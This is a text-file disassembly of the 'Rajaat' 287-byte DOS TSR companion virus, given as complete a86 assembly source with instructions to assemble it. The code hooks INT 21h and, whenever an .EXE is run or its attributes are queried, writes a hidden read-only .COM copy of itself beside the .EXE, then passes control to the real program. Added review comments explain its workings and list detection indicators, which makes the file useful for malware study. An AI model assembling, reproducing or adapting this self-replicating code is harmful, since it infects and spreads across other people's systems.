Text File
|
1996-05-17
|
9KB
|
234 lines
; rajt-287.a86
; TSR companion virus
;
;
; VSUM was a dud on this one (I really should get an update ;^))
; So here is:
; A quick and dirty disaster.. urrr.. disassembly by novice.
;
; you_say_I_make_too_long_labels? get_out_of_here!
;
; assemble with a86 rajt-287.a86
;
; p.s. disregard the corny comments
.RADIX 16
; Every numeric literal in this listing is hexadecimal because of .RADIX 16.
; virus specific equates
ATTR_HIDDEN_READONLY EQU 03 ; attribute mask: bit 0 read-only + bit 1 hidden
COM_BEGIN EQU 0100 ; offset where a .COM image starts in its segment (right after the PSP)
RESIDENCY_TEST EQU 03015 ; AX value of the "is a copy resident?" call; NEW_INT_21 answers with BX=3015
PARAGRAPH_SIZE EQU 029 ; memory kept by this program, in 16-byte paragraphs (29h * 10h = 290h bytes)
TSR_FLAG EQU 0221 ; offset of a one-byte flag: 1 = the residency test was answered
VIR_LENGTH EQU 011F ; bytes written to each companion file (11Fh = 287 decimal, as in the file name)
; dos function equates
; NOTE(review): the names of the 49h/4Ah pair look swapped against the DOS
; function list (AH=49h releases a memory block, AH=4Ah resizes one). The
; values are what the code uses, so read the call sites by value, not by name.
ADJUST_MEM_BLK_SIZE EQU 049 ; INT 21h AH=49h
CLOSE_FILE_W_HANDLE EQU 03E ; INT 21h AH=3Eh, close handle in BX
CREATE_FILE_W_HANDLE EQU 03C00 ; INT 21h AH=3Ch (create/truncate), AL=00
DUPLICATE_HANDLE EQU 045 ; INT 21h AH=45h; not referenced in the visible listing
EXIT_CODE_SUB_PROG EQU 04D ; INT 21h AH=4Dh, fetch the child's exit code
FREE_MEM EQU 04A ; INT 21h AH=4Ah
GET_PUT_ATTRIB EQU 043 ; INT 21h AH=43h, get/set file attributes
GET_VECT_INT21 EQU 03521 ; INT 21h AH=35h, AL=21h: read the INT 21h vector
LOAD_EXECUTE EQU 04B00 ; INT 21h AH=4Bh, AL=00: load and execute a program
QUIT_WITH_EXIT_CODE EQU 04C ; INT 21h AH=4Ch, terminate with exit code in AL
SET_VECT_INT21 EQU 02521 ; INT 21h AH=25h, AL=21h: replace the INT 21h vector
WRITE_TO_FILE_W_HANDLE EQU 040 ; INT 21h AH=40h, write CX bytes from DS:DX to handle BX
START: ; Entry point of the companion .COM file
; Residency handshake: INT 21h is called with AX=3015h and BX is inspected on
; return. In this listing only the handler at NEW_INT_21 copies AX into BX for
; that value, so the AX=3015h / BX=3015h pair is a behavioural indicator an
; analyst can look for in a trace.
MOV B[TSR_FLAG],0 ; start from "no resident copy seen"
MOV AX,RESIDENCY_TEST ; AH=30h is the DOS get-version call, so an unhooked DOS simply answers it
INT 021 ;
CMP BX,RESIDENCY_TEST ; BX=3015h means the hooked handler replied
JE SET_TSR_FLAG ; already resident: skip installing the hook a second time
SET_INT_21: ; Reached only when no resident copy answered: hook INT 21h
MOV AX,GET_VECT_INT21 ; AH=35h/AL=21h: current INT 21h vector is returned in ES:BX
INT 021 ;
; NOTE(review): the two label names below look swapped. BX is the offset and ES
; the segment, so the word named ..._CS holds the offset and ..._IP the segment.
; The resulting offset:segment order is what the far JMP/CALL through
; D[OLD_INT_21] needs, so the code behaves correctly despite the names.
MOV W[OLD_INT21_CS],BX ; save offset of the previous handler
MOV W[OLD_INT21_IP],ES ; save segment of the previous handler
MOV AX,SET_VECT_INT21 ; AH=25h/AL=21h: install DS:DX as the INT 21h handler
MOV DX,OFFSET NEW_INT_21; DS:DX points to NEW_INT_21 (DS equals CS in a .COM program)
INT 021 ; from here on every INT 21h call passes through NEW_INT_21
JMP SHORT SETUP_1STRUN ; jump over the embedded name string
VANITY_PLATE:
db "Rajaat" ; plain ASCII author tag stored inside the code; never executed
; (the JMP SHORT above skips it). A fixed string like this is usable as a
; static signature when scanning files or memory.
SET_TSR_FLAG: ; reached only when the residency test was answered
MOV B[TSR_FLAG],1 ; remember that a resident copy already owns INT 21h
SETUP_1STRUN: ; common path: work out the name of the real .EXE
MOV AH,FREE_MEM ; AH=4Ah: resize the memory block whose segment is in ES
PUSH CS ; ES = CS
POP ES ; (CS = segment of this companion program)
MOV BX,PARAGRAPH_SIZE ; new size: 29h paragraphs = 290h bytes
INT 021 ; shrink own block so DOS has memory for the child program
MOV ES,W[02C] ; word at offset 2Ch of the PSP = segment of the environment block
MOV AH,ADJUST_MEM_BLK_SIZE ; AH=49h: release the block at ES (despite the equate's name)
INT 021 ;
; NOTE(review): the scan below reads the environment block after the AH=49h
; call above, so the code evidently relies on the contents still being there.
MOV DI,1 ; DI=1 and AX=0: set up a search for a zero word
XOR AX,AX ;
READ_IN: ;
DEC DI ; SCASW advances DI by 2, so the net step is one byte per pass
SCASW ; compare AX (0000) with the word at ES:DI
JNE READ_IN ; loop until the double NUL that ends the variable list
LEA SI,[DI+2] ; skip the word that follows the double NUL; SI = start of the
; program path that DOS 3.0+ stores after the environment strings
PUSH ES ; DS = environment segment (copy source)
POP DS ;
PUSH CS ; ES = CS (copy destination)
POP ES ;
MOV DI,0222 ; destination buffer at CS:0222, just past TSR_FLAG
PUSH DI ; saved so it can be popped into DX before the EXEC call
SEARCH_EXT: ; Build "<own path>.EXE" at CS:0222 and run it
LODSB ; copy the program path byte by byte from DS:SI ...
STOSB ; ... to ES:DI
CMP AL,'.' ; stop once the first '.' has been copied
JNE SEARCH_EXT ;
CALL SET_EXTENSION ; append "EXE" plus a terminating zero: the genuine program's name
PUSH CS ; DS = CS again
POP DS ;
POP DX ; DX = 0222, so DS:DX points to the path of the .EXE
MOV AX,LOAD_EXECUTE ; AX=4B00h: load and execute the program named at DS:DX
MOV BX,0213 ; ES:BX = EXEC parameter block; 0213 is where DATA_DUMP lands
; if the image is exactly VIR_LENGTH bytes long (100h + 11Fh - 0Ch)
MOV W[021F],CS ; fill in the segment half of the three far pointers in the
MOV W[021B],CS ; block so they refer to this program's own PSP: command tail
MOV W[0217],CS ; at 80h and the two FCBs at 5Ch/6Ch are passed on unchanged
MOV SP,0286 ; stack top moved to 0286, inside the 290h bytes kept by the resize
INT 021 ; run the host with the caller's arguments; returns here when it exits
CS CMP B[TSR_FLAG],1 ; CS: override, so the test does not depend on DS after the EXEC call
JE ALREADY_RESIDENT ; a copy was resident before this run: just exit
GO_RESIDENT: ; first run on this machine: stay in memory with the hook active
MOV DX,0286 ; DX = offset of the first byte NOT kept resident
INT 027 ; INT 27h: terminate and stay resident, keeping CS:0000..CS:0285
; exit to DOS
; Note: The exit code of the .EXE
; gets lost here!
ALREADY_RESIDENT: ; a copy was already resident: behave like the host did
MOV AH,EXIT_CODE_SUB_PROG ; AH=4Dh: fetch the exit code of the child
; (=companioned .EXE); it comes back in AL
INT 021 ;
MOV AH,QUIT_WITH_EXIT_CODE ; AH=4Ch: terminate, passing on the exit code of the
; companioned .EXE that is still in AL
INT 021 ;
SET_EXTENSION: ; Write the four bytes 'E','X','E',00 at ES:DI
; In:  ES:DI = position just after the '.' of a file name
; Out: DI advanced by 4; AX = 0045
MOV AX,05845 ; stored low byte first: 45h 'E', then 58h 'X'
STOSW ;
MOV AX,045 ; 45h 'E', then 00h as string terminator
STOSW ;
RET
OLD_INT_21: ; far pointer (offset, then segment) to the previous INT 21h handler
; NOTE(review): SET_INT_21 stores BX (offset) in the first word and ES (segment)
; in the second, so the _CS/_IP suffixes are the wrong way round; the layout
; itself is the one a far JMP/CALL through D[OLD_INT_21] expects.
OLD_INT21_CS DW 00 ; holds the OFFSET of the original handler
OLD_INT21_IP DW 00 ; holds the SEGMENT of the original handler
NEW_INT_21: ; Resident INT 21h hook: every DOS call enters here first
CMP AX,RESIDENCY_TEST ; is this the AX=3015h residency probe from START?
JNE CHECK_FUNCTIONS ; no, look at the function number
MOV BX,AX ; yes: copy AX into BX (BX=3015h is the "I am here" reply)
IRET ; return to the caller without passing the call on to DOS
CHECK_FUNCTIONS:
CMP AX,LOAD_EXECUTE ; AX=4B00h, a program is about to be executed?
JE VIRAL_INT ; yes: run the companion-file routine first
CMP AH,GET_PUT_ATTRIB ; AH=43h, get/set file attributes?
JE VIRAL_INT ; yes: same routine (DS:DX is a file name here as well)
; NOTE: The only effect of letting
; get/put file attrib be handled by
; the virus handler is that the virus
; sets its own file attribute to HR each time
; it is run. So if you use ATTRIB.EXE to
; change the settings of the .COM
; file, each time it is run the .COM
; file is set back to HR.
; Neat, but a bit pointless!
JUMP_OLD_INT21: ; everything else goes straight to the previous handler
CS JMP D[OLD_INT_21] ; far jump through the saved vector; that handler's IRET
; returns to the original caller
INT21_CALL: ; Call the previous INT 21h handler directly from inside the hook
; PUSHF followed by a far CALL builds the same stack frame as an INT
; instruction, so the old handler's IRET returns here. Going through the saved
; vector instead of issuing INT 21h keeps the call from re-entering NEW_INT_21.
PUSHF
CS CALL D[OLD_INT_21] ; far call through the saved offset:segment pair
RET ; near return to the caller inside this segment
VIRAL_INT: ; Handles AX=4B00h and AH=43h; DS:DX is the caller's file name
; Observable effect of this routine and WRITE_VIRUS together: when the name
; ends in .EXE, a hidden + read-only .COM file with the same base name is
; created next to it. A companion relies on the DOS command interpreter
; preferring .COM over .EXE when a name is typed without extension.
PUSH AX ; save every register the routine touches, so the
PUSH BX ; original request can be passed on unchanged
PUSH CX ;
PUSH DX ;
PUSH SI ;
PUSH DI ;
PUSH DS ;
PUSH ES ;
MOV SI,DX ; DS:SI = start of the caller's file name
FIND_EXTENSION: ;
LODSB ;
CMP AL,'.' ; advance until the first '.' has been read
JNE FIND_EXTENSION ;
PUSH SI ; ninth stack word: pointer to the first extension character
LODSW ; load first 2 chars of extension
OR AX,02020 ; set bit 5 of both bytes: forces letters to lower case
CMP AX,07865 ; low byte 65h 'e', high byte 78h 'x': extension starts with "ex"?
JNE EXIT_VIRUS_INT ; no, exit
LODSB ; third extension character
OR AL,020 ; lower-case it as well
CMP AL,065 ; 'e'?
JNE EXIT_VIRUS_INT ; not an .EXE name: leave it alone
CHANGE_EXTENSION: ; overwrite "EXE" with "COM" in the caller's own buffer
POP DI ; DI = pointer to the extension ...
PUSH DI ; ... kept on the stack for the restore in WRITE_VIRUS
PUSH DS ; ES = caller's DS, so STOSW/STOSB write into the name
POP ES ;
MOV AX,04F43 ; stored low byte first: 43h 'C', then 4Fh 'O'
STOSW ;
MOV AL,04D ; 'M'
STOSB ;
WRITE_VIRUS: ; create the .COM file and copy this program's image into it
; On entry DS:DX still points at the caller's file name, whose extension has
; just been changed to COM. File-system artefact for detection: a 287-byte
; (11Fh) .COM file with the hidden and read-only attributes set, sharing its
; base name with an .EXE in the same directory.
MOV AX,CREATE_FILE_W_HANDLE ; AH=3Ch: create (or truncate) the file at DS:DX
MOV CX,ATTR_HIDDEN_READONLY ; CX=03: attributes hidden + read-only
CALL INT21_CALL ; goes to the previous handler, not back through the hook
XCHG AX,BX ; BX = handle returned in AX
PUSH CS ; DS = CS: the data to write is this resident program
POP DS ;
MOV DX,COM_BEGIN ; start at 100h
MOV CX,VIR_LENGTH ; for vir_length bytes
MOV AH,WRITE_TO_FILE_W_HANDLE ; AH=40h: write CX bytes from DS:DX to handle BX
CALL INT21_CALL ;
MOV AH,CLOSE_FILE_W_HANDLE ; AH=3Eh: close handle BX
CALL INT21_CALL ;
POP DI ; DI = pointer to the extension in the caller's buffer
CALL SET_EXTENSION ; put "EXE",0 back (ES is still the caller's DS), so the
; pending request continues with the original name
JMP EXIT_VIRUS_INT_2 ; the extra stack word is already gone
EXIT_VIRUS_INT: ; not an .EXE name
POP SI ; discard the saved extension pointer
EXIT_VIRUS_INT_2: ;
POP ES ; restore the eight registers saved at VIRAL_INT,
POP DS ; in reverse order
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
JMP JUMP_OLD_INT21 ; hand the untouched request to the previous INT 21h handler
DATA_DUMP: ; raw bytes left undecoded by the disassembly
; NOTE(review): these 12 bytes are the last bytes of the image and, if the
; listing assembles to exactly VIR_LENGTH bytes, sit at offset 0213, the value
; loaded into BX before the EXEC call. Read as an EXEC parameter block they
; are: environment segment 0000, command tail 0080 + segment, first FCB 005C +
; segment, second FCB offset 006C. The 0756 words are presumably stale segment
; values from the captured sample; the code overwrites them at 0217 and 021B
; (and writes the third segment at 021F) with CS before use. Confirm against
; an assembled image.
db 00,00,80,00,56,07,5c ;
db 00,56,07,6c,00 ;
END ; t-t-thats all f-f-folks